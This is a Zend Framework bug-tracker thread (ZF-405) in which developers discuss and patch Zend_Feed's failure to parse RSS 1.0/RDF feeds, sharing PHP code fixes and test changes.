- Not to tell you how to do your job or anything, but I know last time Brad asked people, instead of just asking for volunteers, and pretty much everyone agreed. I'm sure there are still many capable judges out there that don't even know PLS is coming, 23 June 2007 (UTC)
- That's true. Here's what I'll do: Set up 5 Categories, including Best Article, Best Rewrite, Best Noob Article, Best Illustrated article, and one my category to be announced at a later date (like tommorow). All I really need to do then is round up 3 or 4 more judges, which shouldn't be too hard, and then we can call it even. A lot of people still seem to like Best Noob Article, so I guess we'll keep that, and this way we'll get a new category in, to inject some new blood into this ma. Thus spake ENeGMA. Sir ENeGMA (talk) GUN WotM PLS 22:17, 23 June 2007 (UTC)
I like Best Encyclopedic article, because dry humor is often the best, but it's not as creative as best alternative namespace, so what do I know? Also, please stop browbeating me. I think I may have had a couple concussions already.--<<
>> 03:14, 23 June 2007 (UTC)
- Your prescience is astounding :) The thing is though, you get a lot of plain 'ole Encyclopedic articles for the other categories, generally. Best Rewrite and Best Article have plenty of doctinaire Uncyc articles. Heck, I even made one last time for Best Rewrite: Civil War (*cough*shamelessplug*cough*). I like the style, but I'm not sure it needs its own section, which really could be better used. Also, come onto IRC if you can atm. Sir ENeGMA (talk) GUN WotM PLS 03:17, 23 June 2007 (UTC)
- Why are we narrowing things down so much? Can't the current four categories be of any namespace, be about historical events, be in first-person, or be encyclopedic? Why are we suggesting such specific categories? That's absolutely absurd. I like the Best Voice Article, but every other suggestion is just ridiculous. --Hotadmin4u69 [TALK] 06:54, 23 June 2007 (UTC)
- Yes, they can, but the point about picking a limited category is to test someone's creativity in a specific way. It could be said that 'Best Article' is overly broad, and that it really isn't fair to compare articles so different from one another. Limiting one category I think would give writer's an oppurtunity to compete against each other on a much fairer plane. Best article about the Punic Wars, for example, would be a very specific, amusing test for writers. Or at least it would be for me. Sir ENeGMA (talk) GUN WotM PLS 13:55, 23 June 2007 (UTC)
- Right, but it's like the VFH. Articles of any namespace and topic can be featured. The "Best Article" category is meant to be broad. In the last PLS, there were actually quite a few historically themed articles, and two HowTos submitted (one of them being mine). Being specific about namespaces and topics is stupid, period. The only exception would be if we had a "Best UnNews" category, which I am for. --Hotadmin4u69 [TALK] 18:39, 23 June 2007 (UTC)
I like some of them, but not better than best n00b article. Maybe the quality is lower, but it's a great encouragement to n00bs (which we don't do enough of sometimes!) and probably the only thing they can win - I'm not sure I'd have bothered entering last time if I hadn't been (just) eligible for n00bdom. --Whhhy?Whut?How? *Back from the dead* 09:50, 23 June 2007 (UTC)
- Well, the thing is, the articles that usually Best Noob are always very good. When I judged it, Shandon and Procopius were in 'Best Noob'. And they cleaned house, because they're good writers. Shandon won best noob and Procopius actually won Best Article. So in their case, it didn't really make much sense for them to compete with the rest of the noobs; it was men against boys, as it were. And to be brutally, aside from their articles, it was low quality. So what we end up doing is either: a; rewarding someone who's good enough to compete in other categories, which is unfair or b; rewarding someone who just isn't that good. But that's just my take. If you guys really want Best Noob to stay, It'll stay, I just think there's a lot of potential here. Sir ENeGMA (talk) GUN WotM PLS 13:55, 23 June 2007 (UTC)
- Hmm... very good point. Then again, giving the n00bs some false hope is still vaguely encouraging I suppose. :-) --Whhhy?Whut?How? *Back from the dead* 17:22, 23 June 2007 (UTC)
If I chose the categories, they would be: Best Article, Best Rewrite, Best Illustrated, Best Noob Article, Best Voice Article, Best Expansion, Best Article About a Historical Event, & Best Biography. -- 22:08, 23 June 2007 (UTC)
- I personally wouldn't judge or enter the PLS if that were the case. --Hotadmin4u69 [TALK] 22:22, 23 June 2007 (UTC)
- In fact, your very presence on this earth has caused me to second guess all that I once believed:20, 24 June 2007 (UTC)
I say we'll probably need to vote on categories soon. Perhaps we should say Best Article and Best Rewrite are automatically in, and then we pick the top two or three from the votes.:08, 24 June 2007 (UTC)
- It has already been decided. See the PLS. --Hotadmin4u69 [TALK] 03:23, 24 June 2007 (UTC)
- Damn. Why the hell do I always miss out on finding exactly when the PLS starts?:31, 24 June 2007 (UTC)
- Have no fear, your vote is here: Forum:Official PLS Category Vote - Vote Now or Forever Hold Your Peace I wasn't actually going to do a vote, but your post made me realize people expect one, so there you guys go. Say it loud, you're enfranchised and proud. Sir ENeGMA (talk) GUN WotM PLS 03:33, 24 June 2007 (UTC) | http://uncyclopedia.wikia.com/wiki/Forum:PLS_Category_Discussion?t=20130516044915 | CC-MAIN-2015-48 | refinedweb | 1,524 | 67.99 |
Synopsis_16 - IPC / IO / Signals [DRAFT]
Author: Largely, the authors of the related Perl 5 docs. Maintainer: Larry Wall <[email protected]> Contributions: Mark Stosberg <[email protected]> Date: 12 Sep 2006 Last Modified: 1 May 2007 Version: 17
This is a draft document. Many of these functions will work as in Perl 5, except we're trying to rationalize everything into packages. For now you can assume most of the important functions will automatically be in the * namespace. However, with IO operations in particular, many of them are really methods on an IO handle, and if there is a corresponding global function, it's merely an exported version of the method.
As a starting point, you can help by finding the official Perl 5 documentation for these functions and copying it here.
$file ~~ :f && $file ~~ :T .
You can test multiple features using junctions:
if -$filename ~~ :r & :w & :x {...}
Or pass multiple tests together in OO style:
if $filename.TEST(:e,:x) {...}
our Int multi chown ($uid = -1, $gid = -1, *@files).
$cnt = chmod 0o755, 'foo', 'bar'; chmod 0o755, @executables; $mode = '0644'; chmod $mode, 'foo'; # !!! sets mode to --w----r-T $mode = '0o644'; chmod $mode, 'foo'; # this is better $mode = 0o644; chmod $mode, 'foo'; # this is best
Closes the file or pipe associated with the file handle, returning true only if IO buffers are successfully flushed and closes the system file descriptor. Closes the currently selected filehandle if the argument is omitted.
You don't have to close IO
$!.
my $fh = connect($hostname, 80);
Attempts to connect to a remote host and returns an IO handle if successful. The call fails with an exception if it cannot connect.
Available only as a handle method.
Available only as a handle method.
Available only as a handle method.
Returns a stat buffer. If the lstat succeeds, the stat buffer evaluates to true, and additional file tests may be performed on the value. If the stat fails, all subsequent tests on the stat buffer also evaluate to false.
The
.name method returns the name of the file/socket/uri the handle was opened with, if known. Returns undef otherwise. There is no corresponding
name() function.
# Read my $fh = open($filename); # Write my $fh = open($filename, :w);
our IO method fdopen(Int $fd)
Associate an IO object with an already-open file descriptor, presumably passed in from the parent process.
my $dir = IO::Dir::open('.');
Opens a directory named EXPR for processing. Makes the directory looks like a list of autochomped lines, so just use ordinary IO operators after the open.
Deletes the directory specified by FILENAME if that directory is empty. If it succeeds it returns true, otherwise it returns false and sets
$! (errno). If FILENAME is omitted, uses
$_.
Returns a stat buffer. If the lstat succeeds, the stat buffer evaluates to true, and additional file tests may be performed on the value. If the stat fails, all subsequent tests on the stat buffer also evaluate to false.
Deletes a list of files. Returns the number of files successfully deleted.
$cnt = unlink 'a', 'b', 'c';
Be warned that unlinking a directory can inflict damage on your filesystem. Finally, using
unlink on directories is not supported on many operating systems. Use
rmdir instead.
It is an error to use bare
unlink without arguments.
our Bool method getc (IO $self: *@LIST)
Returns the next character from the input stream attached to IO, or the undefined value at end of file, or if there was an error (in the latter case
$! is set).
our Bool method print (IO $self: *@LIST) our Bool multi print (*@LIST) our Bool method print (Str $self: IO $io)
Prints a string or a list of strings. Returns Bool::True if successful, Failure otherwise. The IO handle, if supplied, must be an object that supports I/O. Indirect objects in Perl 6 must always be followed by a colon, and any indirect object more complicated than a variable should be put into parentheses.
If IO is omitted, prints to
$*DEFOUT, which is aliased to
$*OUT when the program starts but may be temporarily or permanently rebound to some other file handle. The form with leading dot prints
$_ to
$*DEFOUT unless an explicit filehandle is supplied.
It is a compiler error to use a bare
There is are no variables corresponding to Perl 5's
$, and
$\ variables. Use
join to interpose separators; use filehandle properties to change line endings.
our Bool method say (IO $self: *@LIST) our Bool multi say (*@LIST) our Bool method say (Str $self: IO $io)
This is identical to print() except that it auto-appends a newline after the final argument.
Was: print "Hello, world!\n"; Now: say "Hello, world!";
As with
say without arguments.
our Bool method printf (IO $self: Str $fmt, *@LIST) our Bool multi printf (Str $fmt, *@LIST)
The function form works as in Perl 5 and always prints to $*DEFOUT. The method form uses IO handles as objects, not formats.
our List multi method lines (IO $handle:) is export; our List multi lines (Str $filename);
Returns all the lines of a file as a (lazy) List regardless of context. See also
slurp.
Gone, see Pipe.pair
our Str prompt (Str $prompt)
Gone. (Note: for subsecond sleep, just use sleep with a fractional argument.)
our Item multi method slurp (IO $handle: *%opts) is export; our Item multi slurp (Str $filename, *%opts);
Slurps the entire file into a Str or Buf regardless of context. (See also
lines.) Whether a Str or Buf is returned depends on the options.
Gone, see Socket.pair
Prints a warning just like Perl 5, except that it is always sent to the object in $*DEFERR, which is just standard error ($*ERR).
our IO method to(Str $command, *%opts)
Opens a one-way pipe writing to $command. IO redirection for stderr is specified with :err(IO) or :err<Str>. Other IO redirection is done with feed operators. XXX how to specify "2>&1"?
our IO method from(Str $command, *%opts)
Opens a one-way pipe reading from $command. IO redirection for stderr is specified with :err(IO) or :err<Str>. Other IO redirection is done with feed operators. XXX how to specify "2>&1"?
our List of IO method pair()
A wrapper for pipe(2), returns a pair of IO objects representing the reader and writer ends of the pipe.
($r, $w) = Pipe.pair;
our List of IO method pair(Int $domain, Int $type, Int $protocol)
A wrapper for socketpair(2), returns a pair of IO objects representing the reader and writer ends of the socket.
use Socket; ($r, $w) = Socket.pair(AF_UNIX, SOCK_STREAM, PF_UNSPEC);
Please post errors and feedback to perl6-language. If you are making a general laundry list, please separate messages by topic. | http://search.cpan.org/~lichtkind/Perl6-Doc/lib/Perl6/Doc/Design/S16.pod | CC-MAIN-2017-39 | refinedweb | 1,123 | 66.64 |
well im learning python and im trying to make this kind of text game and im stuck on while loop...what im trying to do is have list of things that can be used, and compare user's raw_input to this list, if they chose right one within 5 attempts continue, otherwise die with message. here is my code:
def die(why): print why exit(0) #this is the list user's input is compared to tools = ["paper", "gas", "lighter", "glass", "fuel"] #empty list that users input is appended to yrs = [] choice = None print "You need to make fire" while choice not in tools: print "Enter what you would use:" choice = raw_input("> ") yrs.append(choice) while yrs < 5: print yrs die("you tried too many times") if choice in tools: print "Well done, %s was what you needeed" % choice break
but choice is not being added to list
yrs, it works with just one while loop but then it gonna go forever or until one of items in tools list is entered as users input, however id like to limit it to 5 tries and then enter with :
die("You tried too many times") but it gives me die-message straight after the first attempt... I was searching this forum, didnt find satisfying answer, please help me | http://www.howtobuildsoftware.com/index.php/how-do/br44/python-while-loop-nested-loops-python-nested-loop-with-break | CC-MAIN-2019-30 | refinedweb | 217 | 63.29 |
Maintain a window of len(p) in s, and slide to right until finish. Time complexity is O(len(s)).
from collections import Counter def findAnagrams(self, s, p): """ :type s: str :type p: str :rtype: List[int] """ res = [] pCounter = Counter(p) sCounter = Counter(s[:len(p)-1]) for i in range(len(p)-1,len(s)): sCounter[s[i]] += 1 # include a new char in the window if sCounter == pCounter: # This step is O(1), since there are at most 26 English letters res.append(i-len(p)+1) # append the starting index sCounter[s[i-len(p)+1]] -= 1 # decrease the count of oldest char in the window if sCounter[s[i-len(p)+1]] == 0: del sCounter[s[i-len(p)+1]] # remove the count if it is 0 return res
@weijuemin Nope... because OJ already imports everything. On local machine, you should put
from collections import Counter in the beginning.
@WKVictor Hmmm odd. I had to import Counter on OJ otherwise I'm getting this NameError. Not sure what's going on behind the scene. Well, just a friendly reminder in case you forgot but seems you didn't have the same issue I got so never mind :-)
@Zura Because the window will be slided to right by one position in next iteration, the oldest char will no longer be in the window.
@weijuemin adding from collections import Counter would resolve the issue.
@WKVictor I thought it was an redundant operation(because you can just delete it ) but then I realized that there could be multiple same character in the Counter. Thanks for your explanation.
What is the time complexity of "sCounter == pCounter"? Could it be O(len(p)) in worst case?
def findAnagrams(self, s, p): """ :type s: str :type p: str :rtype: List[int] """ d = defaultdict(int) ns, np = len(s), len(p) ans = [] for c in p: d[c] -= 1 for i in xrange(ns): if i < np: d[s[i]] += 1 if not d[s[i]]: del d[s[i]] else: if not d: ans.append(i-np) d[s[i-np]] -= 1 if not d[s[i-np]] : del d[s[i-np]] d[s[i]] += 1 if not d[s[i]]: del d[s[i]] if not d: ans.append(i-np+1) return ans
Time complexity can be reduced down to O(len(s)) if you use a dictionary instead of a Counter. Same idea, just keep a sliding window and delete the keys when they reach zero. But, there's no need for Counter comparison (which is O(len(p)), since you can just check if the dictionary is empty.
@tototo In fact, since there are at most 26 English letters, pCounter can have at most 26 keys, which implies the comparison "sCounter == pCounter" is actually O(1). So I change the time complexity back to O(len(s)).
Did it using a while loop, thought it was more intuitive.
def findAnagrams(self, s, p): """ :type s: str :type p: str :rtype: List[int] """ a=[] l=len(p) cp=Counter(p) cs=Counter(s[:l-1]) i=0 while i+l<=len(s): cs[s[i+l-1]]+=1 if cs==cp: a.append(i) cs[s[i]]-=1 if cs[s[i]]==0: del cs[s[i]] i+=1 return a
I have a question for the dictionary. Based on sub list, you create a sCounter. In for loops, sCounter[s[i]] += 1. What if s[i] is not a key in the sCounter? It will raise an error.
Looks like your connection to LeetCode Discuss was lost, please wait while we try to reconnect. | https://discuss.leetcode.com/topic/64412/python-sliding-window-solution-using-counter | CC-MAIN-2017-47 | refinedweb | 608 | 71.95 |
STRTOL(3) BSD Programmer's Manual STRTOL(3)
strtol, strtoll, strtoq - convert string value to a long or long long in- teger
#include <stdlib.h> #include <limits.h> long strtol(const char *nptr, char **endptr, int base); #include <stdlib.h> #include <limits.h> long long strtoll(const char *nptr, char **endptr, int base); #include <inttypes.h> intmax_t strtoimax(const char *nptr, char **endptr, int base); #include <sys/types.h> #include <stdlib.h> #include <limits.h> quad_t strtoq(const char *nptr, char **endptr, int base);
The strtol() function converts the string in nptr to a long value. The strtoll() function converts the string in nptr to a long long value. The strtoq() function is a deprecated equivalent of strtoll() and is provided for backwards compatibility with legacy programs. The conversion is done according to the given base, which must be a number between 2 and 36 in- clusive or the special value 0. value in the obvious manner, stopping at the first character which is not a valid digit in the given base. (In bases above 10, the letter 'A' in either upper or lower case represents 10, 'B' represents 11, and so forth, with 'Z' represent- ing 35.) If endptr is non.)
The strtol() function returns the result of the conversion, unless the value would underflow or overflow. If an underflow occurs, strtol() re- turns LONG_MIN. If an overflow occurs, strtol() returns LONG_MAX. In both cases, errno is set to ERANGE. The strtoll() function has identical return values except that LLONG_MIN and LLONG_MAX are used to indicate underflow and overflow respectively.
Ensuring that a string is a valid number (i.e., in range and containing no trailing characters) requires clearing errno beforehand explicitly since errno is not changed on a successful call to strtol(), and the re- turn value of strtol() cannot be used unambiguously to signal an error: char *ep; long lval; ... errno = 0; lval = strtol(buf, &ep, 10); if (buf[0] == '\0' || *ep != '\0') goto not_a_number; if (errno == ERANGE && (lval == LONG_MAX || lval == LONG_MIN)) goto out_of_range; This example will accept "12" but not "12foo" or "12\n". If trailing whi- tespace is acceptable, further checks must be done on *ep; altern (buf[0] == '\0' || *ep != '\0') goto not_a_number; if ((errno == ERANGE && (lval == LONG_MAX || lval == LONG_MIN)) || (lval > INT_MAX || lval < INT_MIN)) goto out_of_range; ival = lval;
[ERANGE] The given string was out of range; the value converted has been clamped.
atof(3), atoi(3), atol(3), atoll(3), sscanf(3), strtod(3), strtoul(3)
The strtol(), strtoll() and strtoimax() functions conform to ISO/IEC 9899:1999 ("ISO C99"). The strtoq() function is a BSD extension and is provided for backwards compatibility with legacy programs.
Ignores the current locale. MirOS BSD #10-current March 19,. | http://www.mirbsd.org/htman/i386/man3/strtoimax.htm | CC-MAIN-2015-06 | refinedweb | 452 | 65.73 |
How many of you...
import 3D models into Hitfilm? Should I pay the $30 for the add on that lets me do that? I just started using Blender and have been using Hitfilm for a long time.
I haven't yet.
It's not the type of thing I do.
That being said ... it IS 40% off so now WOULD be z good time to get it if you plan on doing stuff with 3d models.
It REALLY depends what you want to do in the future.
I'll be a bit of z traitor to HitFilm here and remind you that you CAN do video compositing inside Blender if push comes to shove.
Sure, it's nice to be able to do this in one editor but if you just need a one off VFX with 3d models ...
I've been importing 3d models for about a year now, it's awesome but I'm still learning new things like how to correctly light models and track them in scenes.
@Meridian2351 I have used Pro since about Jan 201, but only imported model a few times trying to do something learning wise until recently. The big obstacle for me was tracking. I only recently was able to track successfully in Hitfilm and lock the model to a point so now I will do more of it. With Express now, you can import the models but they comp will be watermarked and iron out those stumbling blocks before you commit to the add on pack, but really, only you can determine how much you will likely be using it and that will truly be the only metric of it's worth to you, in my opinion.
Been using quite a few. I'm running Pro. The quality of the MODEL matters a lot as to success. I often process them thru Poser, Mixamo, and Blender for things like animations.
best,....... john | https://community.fxhome.com/discussion/54922/how-many-of-you | CC-MAIN-2022-33 | refinedweb | 321 | 81.02 |
26 USC § 6—
(B) any part of any installment under section 6166 (including any part of a deficiency prorated to any installment under such section).
(2) Security
Source(Aug. 16, 1954, ch. 736, 68A Stat. 762; Pub. L. 85–866, title II, § 206(c),Sept. 2, 1958, 72 Stat. 1684; Pub. L. 91–172, title I, § 101(j)(37),Dec. 30, 1969, 83 Stat. 530; Pub. L. 91–614, title I, § 101(h),Dec. 31, 1970, 84 Stat. 1838; Pub. L. 93–406, title II, § 1016(a)(7),Sept. 2, 1974, 88 Stat. 929; Pub. L. 94–455, title XIII, § 1307(d)(2)(C), title XVI, § 1605(b)(3), title XIX, § 1906(b)(13)(A), title XX, § 2004(c)(1), (2),Oct. 4, 1976, 90 Stat. 1727, 1754, 1834, 1867, 1868; Pub. L. 96–223, title I, § 101(f)(1)(H),Apr. 2, 1980, 94 Stat. 252; Pub. L. 96–589, § 6(i)(8),Dec. 24, 1980, 94 Stat. 3410; Pub. L. 97–34, title IV, § 422(e)(1),Aug. 13, 1981, 95 Stat. 316; Pub. L. 100–418, title I, § 1941(b)(2)(B)(viii),Aug. 23, 1988, 102 Stat. 1323; Pub. L. 107–134, title I, § 112(d)(3),Jan. 23, 2002, 115 Stat. 2435.)
Amendments
2002—Subsec. (d)(3). Pub. L. 107–134added par. (3).
1988—Subsec. (b)(1). Pub. L. 100–418substituted “or 44” for “44, or 45” in two places.
1981—Subsec. (a)(2)(B). Pub. L. 97–34struck out reference to section 6166A.
1980—Subsec. (b)(1). Pub. L. 96–223inserted references to chapter 45.
Subsec. (c). Pub. L. 96–589substituted “Claims in cases under title 11 of the United States Code or in receivership proceedings” for “Claims in bankruptcy or receivership proceedings” in heading, and substituted reference to cases under title 11 of the United States Code, for reference to bankruptcy proceedings in text.
1976—Subsec. (a)(1). Pub. L. 94–455, § 1906(b)(13)(A), struck out “or his delegate” after “Secretary”.
Subsec. (a)(2). Pub. L. 94–455, § 2004(c)(1), struck out in subpar. (A) “that the payment, on the due date, of” before “any part of the amount”, in subpar. (B) provisions relating to payment, on the date fixed for payment of any installment, and subpar. (C) which related to payment upon notice and demand of a deficiency prorated under the provisions of section 6161, inserted in subpar. (B) “or 6166A” after “section 6166”, substituted in subpar. (B) “under such section” for “the date for payment for which had not arrived”, and inserted in text following subpar. (B) provisions relating to extension of time for payment in the case of an amount referred to in subpar. (B).
Subsec. (b). Pub. L. 94–455, §§ 1307(d)(2)(C), 1605(b)(3), 2004(c)(2), among other changes, inserted reference to chapter 41, effective on or after Oct. 4, 1976, and reference to chapter 44, applicable to taxable years of real estate investment trusts beginning after Oct. 4, 1976, and struck out provisions relating to grant of extensions with respect to hardships to taxpayers, applicable to the estates of decedents dying after Dec. 31, 1976.
Subsec. (d)(2). Pub. L. 94–455, § 1906(b)(13)(A), struck out “or his delegate” after “Secretary”.
1974—Subsec. (b). Pub. L. 93–406inserted references to chapter 43.
1970—Subsec. (a)(1). Pub. L. 91–614substituted “6 months (12 months in the case of estate tax)” for “6 months”.
1969—Subsec. (b). Pub. L. 91–172inserted references to chapter 42.
1958—Subsec. (a)(2). Pub. L. 85–866inserted provisions allowing Secretary or his delegate to extend time for payment for reasonable period, not exceeding 10 years from date prescribed by section 6151 (a), if he finds that payment on date fixed for payment of any installment under section 6166, or any part of such installment, or payment of any part of a deficiency prorated under section 6166 to installments the date for payment of which had arrived would result in undue hardship. 1980 Amendments
Amendment by Pub. L. 96–589effective Oct. 1, 1979, but not applicable to proceedings under Title 11, Bankruptcy, commenced before Oct. 1, 1979, see section 7(e) ofPub. L. 96–589, set out as a note under section 108 of this title.
Section 101(i) ofPub. L. 96–223, as amended by Pub. L. 99–514, § 2,Oct. 22, 1986, 100 Stat. 2095, provided that:
“(1) In general.—The amendments made by this section [enacting sections 4986 to 4998, 6050C, 6076, and 7241 of this title and amending this section and sections 164, 6211, 6212, 6213, 6214, 6302, 6344, 6501, 6511, 6512, 6601, 6611, 6652, 6653, 6862, 7422, and 7512 of this title] shall apply to periods after February 29, 1980.
“(2) Transitional rules.—For the period ending June 30, 1980, the Secretary of the Treasury or his delegate shall prescribe rules relating to the administration of chapter 45 of the Internal Revenue Code of 1986 [formerly I.R.C. 1954]. To the extent provided in such rules, such rules shall supplement or supplant for such period the administrative provisions contained in chapter 45 of such Code (or in so much of subtitle F of such Code [section 6001 et seq. of this title] as relates to such chapter 45).”
Effective Date of 1976 Amendment
Amendment by section 1307(d)(2)(C) ofPub. L. 94–455effective on and after Oct. 4, 1976, see section 1307(e)(6) ofPub. L. 94–455, set out as a note under section 501 of this title.
For effective date of amendment by section 1605(b)(3) ofPub. L. 94–455, see section 1608(d) ofPub. L. 94–455, set out as a note under section 856 of this title.
Amendment by section 2004(c)(1), (2) ofPub. L. 94–455applicable to estates of decedents dying after Dec. 31, 1976, see section 2004(g) ofPub. L. 94–455, set out as an Effective Date note under section 6166 1969 Amendment
Amendment by Pub. L. 91–172effective Jan. 1, 1970, see section 101(k)(1) ofPub. L. 91–172, set out as an Effective Date note under section 4940 of this title.
Effective Date of 1958 Amendment
Section 206(f) ofPub. L. 85–866, as amended by Pub. L. 99–514, § 2,Oct. 22, 1986, 100 Stat. 2095, provided that: “The amendments made by this section [enacting section 6166 of this title and amending this section and sections 6503 and 6601 of this title] shall apply to estates of decedents with respect to which the date for the filing of the estate tax return (including extensions thereof) prescribed by section 6075(a) of the Internal Revenue Code of 1986 [formerly I.R.C. 1954] is after the date of the enactment of this Act [Sept. 2, 1958]; except that (1) section 6166(i) of such Code as added by this section shall apply to estates of decedents dying after August 16, 1954, but only if the date for the filing of the estate tax return (including extensions thereof) expired on or before the date of the enactment of this Act [Sept. 2, 1958], and (2) notwithstanding section 6166(a) of such Code, if an election under such section is required to be made before the sixtieth day after the date of the enactment of this Act [Sept. 2, 1958] such an election shall be considered timely if made on or before such sixtieth. | http://www.law.cornell.edu/uscode/text/26/6161 | CC-MAIN-2013-48 | refinedweb | 1,236 | 65.62 |
Issues
ZF-405: Empty items array when parsing rss1.0/RDF feed
Description
When trying to parse an RSS1.0 / RDF feed (rdf namespace), items array is empty.
Example : (-;
Produce : [title] => PHP: Hypertext Preprocessor [link] => [description] => The PHP scripting language web site [items] => Array ( )
the XML dump of zend_feed is :
<?xml version="1.0" encoding="utf-8"?>" rdf: PHP: Hypertext Preprocessor The PHP scripting language web site"/> .../...
<rdf:li rdf:"/</a>> </rdf:Seq> </items>
I did a quick review of Zend_Feed, finding that there is a namespace registration which seems to be in trouble, but not sure, and it need probaly to switch the item tag of entryRSS class, or add a new entryRDF class.
It's not a matter, but as this the feed, it's humoristic (-;
Thanks for all you job.
Thierry
Posted by Daniel Bezruchkin (visualimpakt) on 2006-10-13T18:43:13.000+0000
Extracting this into your zend directory will get RDF feeds to work.
Posted by Dave Liefbroer (dliefbroer) on 2006-10-30T01:16:16.000+0000
The attached zip doesn't work. It makes a major error (blank page). Will investigate on the error.
Posted by Dave Liefbroer (dliefbroer) on 2006-10-30T01:52:01.000+0000
It's because of: $success = @$doc->loadXML(Zend_Feed::utf8ToUnicodeEntities($string)); in Feed.php
The utf8ToUnicodeEntities function doesn't exist (wrong code version?)
In the previous version it was: $success = @$doc->loadXML($string); That works!
Posted by Bill Karwin (bkarwin) on 2006-11-13T15:26:52.000+0000
Changing fix version to 0.6.0.
Posted by Ronnie Schwartz (rustybrick) on 2006-11-17T11:40:51.000+0000
I have the exact same issue. Any idea when this will be resolved? I've used PEAR's RSS class, no good. I've used Magpie/simplepie, no good. This one was able to parse all of the new feeds but cannot parse the 1.0 rdf feeds. So it's the best so far!
Posted by Simone Carletti (weppos) on 2007-12-01T12:41:20.000+0000
This bug depends on ZF-26. RSS 1.0 lists items outside channel node and Zend_Feed actually can't handle this situation.
Rather than fixing the behavior, I would suggest to add a new RDF class, as proposed in the description of this issue. RSS 1.0 is completely an other branch compared with RSS 2.0.
The main difference between RSS 0.91 branch (created by Dave Winer) and RSS 1.0 branch (managed by RSS-DEV Working Group) is that the latter is RDF based while RDF architecture has been completely removed in RSS 0.91, RSS 0.92, RSS 2.0.
Additionally, I would suggest to add a new class property to return feed type/version. The following seems to be a list of formats currently supported by Zend feed: * Atom 0.3 * Atom 0.5 * Atom 1.0 * RSS 0.91 * RSS 0.92 * RSS 2.0 The following formats should be supported but they are not, right now: * RSS 1.0 Perhaps a new ticket is the better solution for a new proposal, rather than a comment.
Posted by Simone Carletti (weppos) on 2007-12-01T12:42:19.000+0000
I forgot to say that my previous comment has been inspired by…
Posted by Matthew Turland (elazar) on 2008-02-03T08:24:38.000+0000
The only difference between RSS 1.0 and other versions that is related to this issue is that item elements are not contained within the channel element. The attached file patch.diff modifies Zend_Feed_Rss to check for this and also patches the appropriate test in the test suite so that, without the patch to Zend_Feed_Rss, RSS 1.0 feed tests will fail.
Posted by Simone Carletti (weppos) on 2008-02-07T15:19:01.000+0000
Hi Matthew, I gave a look at the patch you submitted a few days ago.
The following line doesn't really makes sense to me.
{quote} $this->assertTrue($feed->count() > 0); {quote}
_importRssValid method is an utility method and we cannot assume in advance the file he's going to fetch is not a valid empty feed. I would create some valid RSS 1.0 unit tests instead.
The other part of the patch, the code fragment that should introduce RSS 1.0 compatibility it's fine, but I think it's incomplete. Zend_Feed doesn't handle only feed import but it's able to create and edit a feed as well.
Did you think about how an imported RSS 1.0 feed will be printed out? I assume it would be handled by Zend_Feed_Rss class but this library, as underlined by ZF-44, always returns an RSS 2.0 instance. It means, an RSS 1.0 come in and an RSS 2.0 come out... I suppose this is not a good workflow.
What do you propose to fix this consequential issue?
For the sake of completeness, I'd like to share an additional though. is, so far, the best feed parser written in python and probably one of the best feed parsers in the world. Zend_Feed should probably learn something from this library! :)
Posted by Simone Carletti (weppos) on 2008-06-02T05:05:34.000+0000
Any news on this feature? I would suggest to change status to unassigned if work is not in progress.
Posted by Benjamin Eberlei (beberlei) on 2008-11-08T00:53:58.000+0000
I am resolving then reoping this bug, since its occupied over a year now.
Please raise your voice Matthew if this a no go by me :-)
Posted by Benjamin Eberlei (beberlei) on 2008-11-08T00:54:14.000+0000
Reopened issue
Posted by Matthias Sch. (matthias-sch) on 2008-11-19T01:10:10.000+0000
any news on this bug? i think its just including the patch?
Posted by Matthew Turland (elazar) on 2008-11-19T09:21:20.000+0000
As far as I'm aware, no conflicting changes have been made to Zend_Feed_Rss since this patch was suggested, so the patch should work. Note that only the portion of the patch for library/Zend/Feed/Rss.php is really needed.
In terms of the portion that patches tests, it may be a better design decision to create an additional supporting method that first calls _importRssValid and then applies a non-empty check, and have all tests with non-empty test data files call that instead of _importRssValid, so that cases where data is expected to be empty can continue to function as normal.
Thoughts anyone?
Posted by Wil Sinclair (wil) on 2008-12-19T15:05:12.000+0000
Matthew, could you please evaluate the proposed solution and determine what we need to do to get this fixed? According to the votes, there seems to be a lot of interest in this issue.
Posted by Matthew Turland (elazar) on 2008-12-19T17:37:59.000+0000
I've considered Simone's point and have updated my patch accordingly. _importRssValid no longer checks the feed item count in this new patch. Instead, it modifies _importRssValid to return the $feed object it creates to be used by the calling method and modifies the two existing RSS 1.0 test methods to check their respective feed item counts.
I've applied my patch to Zend_Feed_Rss in a current SVN checkout to confirm that it still works. If I run the modified unit tests on the unpatched version of this class file, I get this output:
Posted by Benjamin Eberlei (beberlei) on 2009-01-08T04:38:51.000+0000
Resolved issue, i have verified and applied Matthews Testcases and Bugfixes. Thanks! Two very old bugs gone now :-)
Posted by old of Satoru Yoshida ([email protected]) on 2009-02-02T18:02:32.000+0000
Sorry, not in 1.7.4. I think it may be released in next minor.
Posted by twk (twk) on 2009-05-04T23:06:46.000+0000
The problem is reproducable with some feeds like…
The source of that feed begins with <?xml version="1.0" encoding="utf-8" ?> <?xml-stylesheet
Zend_Feed_Rss#__wakeup() checks if the feed is rdf or not with the following code but the firstChild of that feed is "xml-stylesheet" and so it is not treated as rdf. Please improve the check routine. if ($this->_element->firstChild->nodeName == 'rdf:RDF') { $this->_element = $this->_element->firstChild; } else { $this->_element = $this->_element->getElementsByTagName('channel')->item(0); }
Quick fix for the client user: Replace $feed = Zend_Feed::import($url); with something like $string = file_get_contents($url); $string = str_replace('<?xml-stylesheet href="/rss/user.xsl" type="text/xsl" media="screen" ?>', '', $string); // or whatever between <?xml ?> and <rdf:RDF $feed = Zend_Feed::importString($string);
Posted by twk (twk) on 2009-05-05T00:56:07.000+0000
To fix the problem, replace the following in Zend_Feed_Rss#__wakeup() // Find the base channel element and create an alias to it. if ($this->_element->firstChild->nodeName == 'rdf:RDF') { $this->_element = $this->_element->firstChild; } else { with // Find the base channel element and create an alias to it. $rdf = $this->_element->getElementsByTagNameNS('', 'RDF')->item(0); if ($rdf) { $this->_element = $rdf; } else {
Posted by Matthew Weier O'Phinney (matthew) on 2009-05-05T06:04:21.000+0000
Assigning to Alex.
Posted by Alexander Veremyev (alexander) on 2009-05-06T07:23:40.000+0000
Fixed.
Posted by Matt Steele (orphum) on 2009-05-20T19:10:15.000+0000
Was this added to 1.8.1? I don't see a Zend_Feed_Rdf class...
Posted by Nico Haase (osterlaus) on 2010-03-18T15:12:18.000+0000
I don't see this resolved :( A feed which was linked in ZF-6516 is not accessible, neither this one from a german computer-magazine:
Posted by Nico Haase (osterlaus) on 2010-03-21T04:51:37.000+0000
